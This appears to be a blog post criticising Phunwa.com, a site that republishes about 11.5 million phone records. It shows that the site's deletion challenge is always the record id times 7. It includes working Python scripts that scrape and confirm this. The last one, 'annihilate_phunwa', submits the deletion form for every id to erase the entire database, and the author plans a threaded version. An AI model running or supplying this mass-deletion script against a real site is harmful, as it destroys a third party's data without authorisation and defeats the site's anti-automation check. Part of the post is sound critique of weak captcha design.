Alright, I can't really call this an app; it's more like a search engine ... that allows you to delete its records.
This website, Phunwa.com, pissed me off because it makes ~11.5 million telephone records and related information (name, address) publicly searchable and indexable. I guess Google has already indexed all of the pages, so even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I could go on about how this is a privacy issue, but I'll leave that for another post.
There's a tiny delete button at the bottom that takes you to a confirmation page, which asks you to add two numbers before the record is removed.
There's an id parameter (passed in the POST body) associated with each telephone record, which I suppose is the database id of the record. The two numbers in the equation appear as plain text in the DOM, so they can be scraped to automate the deletion of a record. I wrote a Python script to parse the HTML with a regex and retrieve those numbers:
    import re
    import urllib
    import urllib2

    # Matches the "<a> + <b>" challenge shown on the confirmation page.
    equation = re.compile(r'([0-9]+) \+ ([0-9]+)')
    p_url = 'http://www.phunwa.com/removeentry/'

    for counter in range(800000, 800005):
        # Same form fields the delete button submits.
        params = {
            'id': counter,
            'Remove this entry': 'Remove this number from the site'
        }
        req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
        phunwa = urllib2.urlopen(req)
        source = phunwa.read()
        # Pull both operands out of the page and print their sum.
        numbers = equation.findall(source)
        for num in numbers:
            print "id: %s | %s + %s = %s" % \
                (counter, num[0], num[1], int(num[0]) + int(num[1]))
Which gives the following output:
    id: 800000 | 119805 + 5480195 = 5600000
    id: 800001 | 787730 + 4812277 = 5600007
    id: 800002 | 534978 + 5065036 = 5600014
    id: 800003 | 155396 + 5444625 = 5600021
    id: 800004 | 88748 + 5511280 = 5600028
For each increment of the id, the answer increases by 7 (even though the two numbers themselves are generated differently each time), which can only mean one thing:
Whoever designed this thing has never heard of reCAPTCHA. It doesn't even verify whether the referrer (which is the URL containing the phone number associated with the id) is correct, but that's too much to ask for, considering the confirmation method they chose to implement is answer = id*7.
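As a quick sanity check on that claim, here is a minimal sketch that re-adds the five pairs from the output above and compares each sum with id*7. The helper names (`expected_answer`, `check_samples`) are made up for illustration, and five consecutive ids are hardly proof that the rule holds across the whole range, so treat it as a hypothesis that happens to fit every sample.

```python
# Rows copied from the output above: (id, first number, second number).
samples = [
    (800000, 119805, 5480195),
    (800001, 787730, 4812277),
    (800002, 534978, 5065036),
    (800003, 155396, 5444625),
    (800004, 88748, 5511280),
]


def expected_answer(record_id):
    """Hypothesised rule: the challenge answer is always 7 times the id."""
    return record_id * 7


def check_samples(rows):
    """Return True if, for every row, the two numbers sum to 7 * id."""
    return all(a + b == expected_answer(record_id) for record_id, a, b in rows)


print(check_samples(samples))  # prints True
```

It needs no network access and runs unchanged on Python 2 and 3, since it only works on the numbers already printed.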
The total number of records could be around 11,547,208. That's the highest value the id reaches before the site returns a 500. In theory, it is thus possible to delete every record on Phunwa.com without user intervention at any point, apart from hiring an EC2 instance and running this script:
    import urllib
    import urllib2

    def annihilate_phunwa():
        p_url = 'http://www.phunwa.com/confirmdelete/'
        # xrange avoids building an 11.5-million-element list in Python 2.
        for counter in xrange(1, 11547209):
            params = {
                'id': counter,
                'answer': counter * 7,  # the "captcha" answer is always id*7
                'Confirm Delete': 'Submit Query'
            }
            try:
                req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
                phunwa = urllib2.urlopen(req)
            except urllib2.HTTPError, e:
                # e.code holds the numeric HTTP status of the failed request.
                if e.code == 500:
                    print 'id=%s may already be deleted!' % counter
                else:
                    print 'Something else has gone wrong!'

    annihilate_phunwa()
I may update this script with a threaded version.